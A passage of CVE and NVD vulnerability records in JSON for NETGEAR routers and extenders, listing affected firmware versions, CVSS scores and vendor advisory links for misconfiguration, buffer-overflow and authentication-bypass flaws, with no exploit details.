"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2017-18744",
"datePublished": "2020-04-23T15:36:15",
"dateReserved": "2020-04-20T00:00:00",
"dateUpdated": "2024-08-05T21:37:42.903Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2017-18741
Vulnerability from cvelistv5
Published
2020-04-23 15:49
Modified
2024-08-05 21:37
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects R6250 before 1.0.4.8, R6300v2 before 1.0.4.8, R6700 before 1.0.1.20, R7000 before 1.0.7.10, R7000P before 1.0.0.58, R6900P before 1.0.0.58, R7100LG before 1.0.0.32, R7900 before 1.0.1.14, R8000 before 1.0.3.22, and R8500 before 1.0.2.94.
References
| ▼ | URL | Tags |
|---|---|---|
| https://kb.netgear.com/000051514/Security-Advisory-for-Security-Misconfiguration-on-Some-Routers-PSV-2017-0335 | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T21:37:43.461Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000051514/Security-Advisory-for-Security-Misconfiguration-on-Some-Routers-PSV-2017-0335"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects R6250 before 1.0.4.8, R6300v2 before 1.0.4.8, R6700 before 1.0.1.20, R7000 before 1.0.7.10, R7000P before 1.0.0.58, R6900P before 1.0.0.58, R7100LG before 1.0.0.32, R7900 before 1.0.1.14, R8000 before 1.0.3.22, and R8500 before 1.0.2.94."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:N/C:H/I:N/PR:N/S:C/UI:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-23T15:49:06",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000051514/Security-Advisory-for-Security-Misconfiguration-on-Some-Routers-PSV-2017-0335"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2017-18741",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects R6250 before 1.0.4.8, R6300v2 before 1.0.4.8, R6700 before 1.0.1.20, R7000 before 1.0.7.10, R7000P before 1.0.0.58, R6900P before 1.0.0.58, R7100LG before 1.0.0.32, R7900 before 1.0.1.14, R8000 before 1.0.3.22, and R8500 before 1.0.2.94."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"availabilityImpact": "NONE",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:N/C:H/I:N/PR:N/S:C/UI:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000051514/Security-Advisory-for-Security-Misconfiguration-on-Some-Routers-PSV-2017-0335",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000051514/Security-Advisory-for-Security-Misconfiguration-on-Some-Routers-PSV-2017-0335"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2017-18741",
"datePublished": "2020-04-23T15:49:06",
"dateReserved": "2020-04-20T00:00:00",
"dateUpdated": "2024-08-05T21:37:43.461Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2019-20712
Vulnerability from cvelistv5
Published
2020-04-16 15:35
Modified
2024-08-05 02:53
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects D6220 before 1.0.0.52, D6400 before 1.0.0.86, D7000v2 before 1.0.0.53, D8500 before 1.0.3.44, DGN2200v4 before 1.0.0.110, DGND2200Bv4 before 1.0.0.109, R6250 before 1.0.4.34, R6300v2 before 1.0.4.32, R6400 before 1.0.1.46, R6400v2 before 1.0.2.62, R6700 before 1.0.2.6, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R7000 before 1.0.9.60, R7000P before 1.3.1.64, R7100LG before 1.0.0.52, R7300DST before 1.0.0.70, R7900 before 1.0.3.8, R7900P before 1.4.1.30, R8000 before 1.0.4.28, R8000P before 1.4.1.30, R8300 before 1.0.2.128, R8500 before 1.0.2.128, WNDR3400v3 before 1.0.1.24, and WNR3500Lv2 before 1.2.0.56.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T02:53:07.506Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000061216/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Routers-and-Gateways-PSV-2018-0323"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects D6220 before 1.0.0.52, D6400 before 1.0.0.86, D7000v2 before 1.0.0.53, D8500 before 1.0.3.44, DGN2200v4 before 1.0.0.110, DGND2200Bv4 before 1.0.0.109, R6250 before 1.0.4.34, R6300v2 before 1.0.4.32, R6400 before 1.0.1.46, R6400v2 before 1.0.2.62, R6700 before 1.0.2.6, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R7000 before 1.0.9.60, R7000P before 1.3.1.64, R7100LG before 1.0.0.52, R7300DST before 1.0.0.70, R7900 before 1.0.3.8, R7900P before 1.4.1.30, R8000 before 1.0.4.28, R8000P before 1.4.1.30, R8300 before 1.0.2.128, R8500 before 1.0.2.128, WNDR3400v3 before 1.0.1.24, and WNR3500Lv2 before 1.2.0.56."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:H/C:H/I:H/PR:H/S:U/UI:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-16T15:35:33",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000061216/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Routers-and-Gateways-PSV-2018-0323"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2019-20712",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects D6220 before 1.0.0.52, D6400 before 1.0.0.86, D7000v2 before 1.0.0.53, D8500 before 1.0.3.44, DGN2200v4 before 1.0.0.110, DGND2200Bv4 before 1.0.0.109, R6250 before 1.0.4.34, R6300v2 before 1.0.4.32, R6400 before 1.0.1.46, R6400v2 before 1.0.2.62, R6700 before 1.0.2.6, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R7000 before 1.0.9.60, R7000P before 1.3.1.64, R7100LG before 1.0.0.52, R7300DST before 1.0.0.70, R7900 before 1.0.3.8, R7900P before 1.4.1.30, R8000 before 1.0.4.28, R8000P before 1.4.1.30, R8300 before 1.0.2.128, R8500 before 1.0.2.128, WNDR3400v3 before 1.0.1.24, and WNR3500Lv2 before 1.2.0.56."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"availabilityImpact": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:H/C:H/I:H/PR:H/S:U/UI:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000061216/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Routers-and-Gateways-PSV-2018-0323",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000061216/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Routers-and-Gateways-PSV-2018-0323"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2019-20712",
"datePublished": "2020-04-16T15:35:33",
"dateReserved": "2020-04-15T00:00:00",
"dateUpdated": "2024-08-05T02:53:07.506Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2017-18772
Vulnerability from cvelistv5
Published
2020-04-22 14:47
Modified
2024-08-05 21:37
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by authentication bypass. This affects EX3700 before 1.0.0.64, EX3800 before 1.0.0.64, EX6120 before 1.0.0.32, EX6130 before 1.0.0.16, R6300v2 before 1.0.4.12, R6700 before 1.0.1.26, R6900 before 1.0.1.22, R7000 before 1.0.9.6, R7300DST before 1.0.0.52, R7900 before 1.0.1.12, R8000 before 1.0.3.24, R8500 before 1.0.2.74, and WNR2000v2 before 1.2.0.8.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T21:37:43.945Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000051471/Security-Advisory-for-Authentication-Bypass-on-Some-Routers-and-Extenders-PSV-2017-0424"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by authentication bypass. This affects EX3700 before 1.0.0.64, EX3800 before 1.0.0.64, EX6120 before 1.0.0.32, EX6130 before 1.0.0.16, R6300v2 before 1.0.4.12, R6700 before 1.0.1.26, R6900 before 1.0.1.22, R7000 before 1.0.9.6, R7300DST before 1.0.0.52, R7900 before 1.0.1.12, R8000 before 1.0.3.24, R8500 before 1.0.2.74, and WNR2000v2 before 1.2.0.8."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:H/C:H/I:H/PR:N/S:U/UI:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-22T14:47:17",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000051471/Security-Advisory-for-Authentication-Bypass-on-Some-Routers-and-Extenders-PSV-2017-0424"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2017-18772",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by authentication bypass. This affects EX3700 before 1.0.0.64, EX3800 before 1.0.0.64, EX6120 before 1.0.0.32, EX6130 before 1.0.0.16, R6300v2 before 1.0.4.12, R6700 before 1.0.1.26, R6900 before 1.0.1.22, R7000 before 1.0.9.6, R7300DST before 1.0.0.52, R7900 before 1.0.1.12, R8000 before 1.0.3.24, R8500 before 1.0.2.74, and WNR2000v2 before 1.2.0.8."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"availabilityImpact": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:H/C:H/I:H/PR:N/S:U/UI:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000051471/Security-Advisory-for-Authentication-Bypass-on-Some-Routers-and-Extenders-PSV-2017-0424",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000051471/Security-Advisory-for-Authentication-Bypass-on-Some-Routers-and-Extenders-PSV-2017-0424"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2017-18772",
"datePublished": "2020-04-22T14:47:17",
"dateReserved": "2020-04-20T00:00:00",
"dateUpdated": "2024-08-05T21:37:43.945Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
Vulnerability from fkie_nvd
Published
2020-04-22 17:15
Modified
2024-11-21 03:20
Severity ?
Summary
Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects D6220 before 1.0.0.32, D6400 before 1.0.0.66, D8500 before 1.0.3.35, DGN2200Bv4 before 1.0.0.94, DGN2200v4 before 1.0.0.94, R6250 before 1.0.4.14, R6300v2 before 1.0.4.18, R6400 before 1.01.32, R6400v2 before 1.0.2.44, R6700 before 1.0.1.36, R6900 before 1.0.1.30, R6900P before 1.3.0.8, R7000 before 1.0.9.14, R7000P before 1.3.0.8, R7100LG before 1.0.0.34, R7900 before 1.0.2.4, R8000 before 1.0.4.2, WN2500RPv2 before 1.0.1.50, WNDR3400v3 before 1.0.1.14, and WNDR4000 before 1.0.2.10.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| netgear | d6220_firmware | * | |
| netgear | d6220 | - | |
| netgear | d6400_firmware | * | |
| netgear | d6400 | - | |
| netgear | d8500_firmware | * | |
| netgear | d8500 | - | |
| netgear | dgn2200b_firmware | * | |
| netgear | dgn2200b | v4 | |
| netgear | dgn2200_firmware | * | |
| netgear | dgn2200 | v4 | |
| netgear | r6250_firmware | * | |
| netgear | r6250 | - | |
| netgear | r6300_firmware | * | |
| netgear | r6300 | v2 | |
| netgear | r6400_firmware | * | |
| netgear | r6400 | - | |
| netgear | r6400_firmware | * | |
| netgear | r6400 | v2 | |
| netgear | r6700_firmware | * | |
| netgear | r6700 | - | |
| netgear | r6900_firmware | * | |
| netgear | r6900 | - | |
| netgear | r6900p_firmware | * | |
| netgear | r6900p | - | |
| netgear | r7000_firmware | * | |
| netgear | r7000 | - | |
| netgear | r7000p_firmware | * | |
| netgear | r7000p | - | |
| netgear | r7100lg_firmware | * | |
| netgear | r7100lg | - | |
| netgear | r7900_firmware | * | |
| netgear | r7900 | - | |
| netgear | r8000_firmware | * | |
| netgear | r8000 | - | |
| netgear | wn2500rp_firmware | * | |
| netgear | wn2500rp | v2 | |
| netgear | wndr3400_firmware | * | |
| netgear | wndr3400 | v3 | |
| netgear | wndr4000_firmware | * | |
| netgear | wndr4000 | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1FD6552E-5BF6-4E57-90A7-39C4543B469C",
"versionEndExcluding": "1.0.0.32",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3EEA190-2E9C-4586-BF81-B115532FBA23",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CE087F75-4C99-425C-A9B7-B261E5545297",
"versionEndExcluding": "1.0.0.66",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7D30939B-86E3-4C78-9B05-686B4994C8B9",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9398174B-A4A6-449A-AB91-A93D3D9398DD",
"versionEndExcluding": "1.0.3.35",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "814A0114-9A1D-4EA0-9AF4-6968514E4F01",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200b_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D5C27C8A-1B80-47CD-B015-14588F4F8732",
"versionEndExcluding": "1.0.0.94",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200b:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "25090794-A90C-40CD-8E95-87EC4E98B928",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FCA60A85-77FF-41BF-89FA-7EB3ACFECDB8",
"versionEndExcluding": "1.0.0.94",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "099184A0-F1C6-4C3F-9C3B-F0B9AC0D4D14",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2DD089FE-0DBF-4C3B-AA02-3A0A27CF9D76",
"versionEndExcluding": "1.0.4.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "55058831-92FF-4A87-8340-E25AC0DDF89E",
"versionEndExcluding": "1.0.4.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "54D9B854-7E18-439E-8FD2-C0EC88DA6222",
"versionEndExcluding": "1.01.32",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4CDF6B-3829-44D0-9675-71D7BE83CAA2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DDC0DA75-5EB9-4F53-99A9-798FFBFD0C15",
"versionEndExcluding": "1.0.2.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "52AE9AD2-BC8D-477D-A3D3-891AE52FA5F3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "442F153C-737B-44D4-9A6D-EB6F6C47B986",
"versionEndExcluding": "1.0.1.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F4E70DE3-B7E2-4F51-84E7-045BBCCFAD68",
"versionEndExcluding": "1.0.1.30",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "326BBECA-9A76-4A3E-90F7-023797D5D186",
"versionEndExcluding": "1.3.0.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CDE61DB5-86A6-4810-91CC-18D05DC09507",
"versionEndExcluding": "1.0.9.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "09963BE1-D57D-491A-9BD8-A1A46ED993E0",
"versionEndExcluding": "1.3.0.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7100lg_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2FB08FA1-A476-4E05-9904-9BE30C9E77B7",
"versionEndExcluding": "1.0.0.34",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7100lg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "366FA778-3C2A-42AF-9141-DAD7043B406C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BCE1150D-8464-4421-94BD-EE81977BAC34",
"versionEndExcluding": "1.0.2.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EDC9BDA8-A1F1-42D6-8979-3FC7FA96AC62",
"versionEndExcluding": "1.0.4.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wn2500rp_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E194887B-3570-4E0F-B8DC-072676EDA4A7",
"versionEndExcluding": "1.0.1.50",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wn2500rp:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "1C4C1B98-9551-4862-AEAC-3D5C313BD275",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DF8551B9-72D9-46B8-9F66-EE7841E29A26",
"versionEndExcluding": "1.0.1.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3400:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "1992E44C-122C-41BC-8FDC-5F9EBEE1FB7C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BEC68564-E9BB-4248-A238-2806A9CE824B",
"versionEndExcluding": "1.0.2.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "1C34EC74-D6F1-46F1-B47E-E62793171427",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
